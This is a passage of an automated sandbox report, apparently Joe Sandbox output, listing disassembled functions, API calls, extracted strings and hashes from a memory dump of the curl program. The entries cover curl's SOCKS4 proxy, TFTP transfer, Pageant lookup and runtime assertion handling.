                                                                                                                                                                    • Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client., xrefs: 001F0A3D
                                                                                                                                                                    • Failed to send SOCKS4 connect request., xrefs: 001F0AE3
                                                                                                                                                                    • SOCKS4%s request granted., xrefs: 001F09A5
                                                                                                                                                                    • Too long SOCKS proxy name, can't use!, xrefs: 001F0811
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Count64Tick$CloseErrorHandleLastObjectSingleWaitioctlsocketrecv
                                                                                                                                                                    • String ID: %hu.%hu.%hu.%hu$Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.$Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.$Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.$Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.$Connection time-out$Failed to receive SOCKS4 connect request ack.$Failed to resolve "%s" for SOCKS4 connect.$Failed to send SOCKS4 connect request.$Failed to send SOCKS4 connect request.$SOCKS4 communication to %s:%d$SOCKS4 connect to %s (locally resolved)$SOCKS4 reply has wrong version, version should be 4.$SOCKS4%s request granted.$Too long SOCKS proxy name, can't use!
                                                                                                                                                                    • API String ID: 1703271474-1625008050
                                                                                                                                                                    • Opcode ID: b615585de12cedd713bc0c112ee44124ce1c134cf8b0c64b3a125947debf9f64
                                                                                                                                                                    • Instruction ID: 43f49d629e652d8f4f28abb062f5a5331ecb64361dfb209c9b77715e9fbf3418
                                                                                                                                                                    • Opcode Fuzzy Hash: b615585de12cedd713bc0c112ee44124ce1c134cf8b0c64b3a125947debf9f64
                                                                                                                                                                    • Instruction Fuzzy Hash: AFE1187150C3846BC75ADB24C851ABFBBE89B9D304F04095EF6C697283D729DA44CBA2
                                                                                                                                                                    Function 002C515B Relevance: 26.7, APIs: 5, Strings: 10, Instructions: 488COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleExW.KERNEL32(00000006,00000001,?,?,?,?,?,?,?,?,?,?), ref: 002C5220
                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,?,?,?,?,?,?), ref: 002C524C
                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F4,?,?,?), ref: 002C5703
                                                                                                                                                                    • GetFileType.KERNEL32(00000000), ref: 002C573E
                                                                                                                                                                    • WriteConsoleW.KERNEL32(00000000,?,00000000,?,00000000), ref: 002C5767
                                                                                                                                                                    Strings
                                                                                                                                                                    • Expression: , xrefs: 002C54B3
                                                                                                                                                                    • File: , xrefs: 002C531E
                                                                                                                                                                    • Assertion failed: %s, file %s, line %d, xrefs: 002C5726, 002C579E
                                                                                                                                                                    • Assertion failed!, xrefs: 002C51A8
                                                                                                                                                                    • Program: , xrefs: 002C51F3
                                                                                                                                                                    • Microsoft Visual C++ Runtime Library, xrefs: 002C55CD
                                                                                                                                                                    • (Press Retry to debug the application - JIT must be enabled), xrefs: 002C55A5
                                                                                                                                                                    • <program name unknown>, xrefs: 002C5256
                                                                                                                                                                    • For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts, xrefs: 002C556A
                                                                                                                                                                    • Line: , xrefs: 002C543C
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileHandleModule$ConsoleNameTypeWrite
                                                                                                                                                                    • String ID: (Press Retry to debug the application - JIT must be enabled)$<program name unknown>$Assertion failed!$Assertion failed: %s, file %s, line %d$Expression: $File: $For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts$Line: $Microsoft Visual C++ Runtime Library$Program:
                                                                                                                                                                    • API String ID: 1567978977-2333777566
                                                                                                                                                                    • Opcode ID: d76709dc6b163479d8669cc9004c9a737c5380dea54128ab8eaa6b7f9790674e
                                                                                                                                                                    • Instruction ID: a09d7918cbfb7c0cc9d6e6e3776d3536a4be0db8a2406d23505da1ec252a6486
                                                                                                                                                                    • Opcode Fuzzy Hash: d76709dc6b163479d8669cc9004c9a737c5380dea54128ab8eaa6b7f9790674e
                                                                                                                                                                    • Instruction Fuzzy Hash: 2CF1EDB1D2071AA6EF109A708DC5F9E776C9B54708F10056AFA04D6192F630EEF88F50
                                                                                                                                                                    Function 001C53F0 Relevance: 26.6, APIs: 1, Strings: 14, Instructions: 331COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetTickCount64.KERNEL32 ref: 001C5436
                                                                                                                                                                      • Part of subcall function 002C144E: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,?,00000000,?,000003E8,00000000), ref: 002C1457
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Time$Count64FileSystemTick
                                                                                                                                                                    • String ID: %02d:%02d:%02d.%06ld $%s%s $%s%s $%s%s $%s%s $%s== Info: %s$<= Recv SSL data$<= Recv data$<= Recv header$=> Send SSL data$=> Send data$=> Send header$Failed to create/open output$[%zd bytes data]
                                                                                                                                                                    • API String ID: 4062084619-2048222653
                                                                                                                                                                    • Opcode ID: 9c477c5216c4cb9b8020983a3720c157ad51755bcd668d03378765cbcd4de841
                                                                                                                                                                    • Instruction ID: 221a5e7155be3958ea383679e0e066b374fd9e1b61c15286388b5244c0488108
                                                                                                                                                                    • Opcode Fuzzy Hash: 9c477c5216c4cb9b8020983a3720c157ad51755bcd668d03378765cbcd4de841
                                                                                                                                                                    • Instruction Fuzzy Hash: EAB168716043409FCB01DF24DC82F6BBBEAEBA9304F80056DF94987252E771E995CB92
                                                                                                                                                                    Function 00205CF0 Relevance: 26.5, APIs: 6, Strings: 9, Instructions: 223networkCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • send.WS2_32(?,?,00000002,00000000), ref: 00205E9B
                                                                                                                                                                    • WSAGetLastError.WS2_32 ref: 00205EA5
                                                                                                                                                                    • send.WS2_32(?,?,?,00000000), ref: 00205F20
                                                                                                                                                                    • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00205F2E
                                                                                                                                                                    • send.WS2_32(?,?,?,00000000), ref: 00205F97
                                                                                                                                                                    • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00205FA1
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLastsend
                                                                                                                                                                    • String ID: %127[^,],%127s$%c%c$%c%c%c%c$%c%c%c%c%s%c%c$%c%c%c%c%s%c%c$%c%s%c%s$Sending data failed (%d)$Sending data failed (%d)$Sending data failed (%d)
                                                                                                                                                                    • API String ID: 1802528911-2271365543
                                                                                                                                                                    • Opcode ID: 5862a547ae17a8b8d3125d27d29d09fb964181a86991ec902bbee03a9909bbad
                                                                                                                                                                    • Instruction ID: 1561d3ce471b5d56398791e00c01f52d13e873d5e57e91c29bf128f29dbfb499
                                                                                                                                                                    • Opcode Fuzzy Hash: 5862a547ae17a8b8d3125d27d29d09fb964181a86991ec902bbee03a9909bbad
                                                                                                                                                                    • Instruction Fuzzy Hash: C4711571644756ABE731DF24CC4AFE777ADAF48700F040429FA899B1C3DB71A9188BA1
                                                                                                                                                                    Function 002B4290 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 194filethreadwindowCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • FindWindowA.USER32(Pageant,Pageant), ref: 002B42CB
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 002B4306
                                                                                                                                                                    • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00002000,?), ref: 002B4331
                                                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 002B4354
                                                                                                                                                                    • SendMessageA.USER32(?,0000004A,00000000,804E50BA), ref: 002B43C5
                                                                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 002B43E8
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 002B43EF
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$View$CloseCreateCurrentFindHandleMappingMessageSendThreadUnmapWindow
                                                                                                                                                                    • String ID: Pageant$Pageant$PageantRequest%08x$G6
                                                                                                                                                                    • API String ID: 440355138-1427937923
                                                                                                                                                                    • Opcode ID: 5d9798d13c3f3e619366dd6160ba9250c860a164f95798cde39421140cb7fc4a
                                                                                                                                                                    • Instruction ID: 868f77cc1160cc7783e956bbe616eda4f3ec3d0e48ce0343e77caa69a4917109
                                                                                                                                                                    • Opcode Fuzzy Hash: 5d9798d13c3f3e619366dd6160ba9250c860a164f95798cde39421140cb7fc4a
                                                                                                                                                                    • Instruction Fuzzy Hash: 9F61E6716006019FC710DF38EC89BAE77E8BF89320F44476AF55A8B2D2E7319915CB52
                                                                                                                                                                    Function 0025BCC8 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 206COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CountTick
                                                                                                                                                                    • String ID: f#
                                                                                                                                                                    • API String ID: 536389180-1456218785
                                                                                                                                                                    • Opcode ID: d8b1bbdbe3c5d8d66331aaa677c57409f44a77d5ec1971e849f63f5944e95e92
                                                                                                                                                                    • Instruction ID: 7b8a3dabc1d6c0fb90bfb1cf1a22d0eadcbb46ffa1332ccd75e3cd22c4085600
                                                                                                                                                                    • Opcode Fuzzy Hash: d8b1bbdbe3c5d8d66331aaa677c57409f44a77d5ec1971e849f63f5944e95e92
                                                                                                                                                                    • Instruction Fuzzy Hash: 5D818C7092161A8FCF229F24CC85BAEB779BF41312F5442A9DD09A6150EB30DE98CF58
                                                                                                                                                                    Function 001F7C00 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 222networkCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • sendto.WS2_32(?,?,?,00000000,?,?), ref: 001F7CA3
                                                                                                                                                                    • WSAGetLastError.WS2_32(?,?,001F7488,?,?,001F7880), ref: 001F7CAD
                                                                                                                                                                    • sendto.WS2_32(?,?,?,00000000,?,?), ref: 001F7D79
                                                                                                                                                                    • WSAGetLastError.WS2_32(?,?,001F7880), ref: 001F7D83
                                                                                                                                                                    • sendto.WS2_32(?,?,00000004,00000000,?,?), ref: 001F7EA7
                                                                                                                                                                    Strings
                                                                                                                                                                    • Timeout waiting for block %d ACK. Retries = %d, xrefs: 001F7DDD
                                                                                                                                                                    • Received ACK for block %d, expecting %d, xrefs: 001F7C5C
                                                                                                                                                                    • tftp_tx: giving up waiting for block %d ack, xrefs: 001F7C7A
                                                                                                                                                                    • tftp_tx: internal error, event: %i, xrefs: 001F7EBA
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: sendto$ErrorLast
                                                                                                                                                                    • String ID: Received ACK for block %d, expecting %d$Timeout waiting for block %d ACK. Retries = %d$tftp_tx: giving up waiting for block %d ack$tftp_tx: internal error, event: %i
                                                                                                                                                                    • API String ID: 4042023021-4197595102
                                                                                                                                                                    • Opcode ID: a916f57ea8adf1e156fd20496eb7a8a7a6a2389ca7fc64e65efad72f14ad7b2e
                                                                                                                                                                    • Instruction ID: 62f57a604908bf3d4829c29b9bbaf5ae8cc3fdcd2b39e90dd70d14f76c8fa99b
                                                                                                                                                                    • Opcode Fuzzy Hash: a916f57ea8adf1e156fd20496eb7a8a7a6a2389ca7fc64e65efad72f14ad7b2e
                                                                                                                                                                    • Instruction Fuzzy Hash: 3281AB75204B019BD3229B68DC85AB7B7F5FB98301F04492AE9AAC6292D731E854DB20
                                                                                                                                                                    Function 001F7920 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 220networkCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • sendto.WS2_32(?,?,00000004,00000000,?,?), ref: 001F79D0
                                                                                                                                                                    • WSAGetLastError.WS2_32(?,?,001F74C8,?,?,001F78A1), ref: 001F79DA
                                                                                                                                                                    • sendto.WS2_32(?,?,00000004,00000000,?,?), ref: 001F7A98
                                                                                                                                                                    • WSAGetLastError.WS2_32(?,?,001F78A1), ref: 001F7AA2
                                                                                                                                                                    • sendto.WS2_32(?,?,00000004,00000000,?,?), ref: 001F7BB0
                                                                                                                                                                    Strings
                                                                                                                                                                    • Timeout waiting for block %d ACK. Retries = %d, xrefs: 001F7AF3
                                                                                                                                                                    • Received unexpected DATA packet block %d, expecting block %d, xrefs: 001F7A33
                                                                                                                                                                    • Received last DATA packet block %d again., xrefs: 001F7976
                                                                                                                                                                    • tftp_rx: internal error, xrefs: 001F7BC2
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
